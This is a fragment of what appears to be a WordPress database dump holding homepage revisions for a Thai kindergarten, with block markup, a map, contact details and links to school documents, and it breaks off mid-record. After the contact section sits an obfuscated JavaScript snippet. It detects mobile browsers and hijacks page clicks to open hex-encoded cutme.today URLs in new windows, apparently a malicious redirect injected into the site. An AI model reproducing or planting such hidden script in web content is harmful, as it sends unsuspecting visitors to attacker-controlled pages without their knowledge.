{\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:37:10','2025-06-27 08:37:10','',19,'http://watprato.ssk.in.th/?p=580',0,'revision','',0),
(582,1,'2025-06-27 15:38:37','2025-06-27 08:38:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 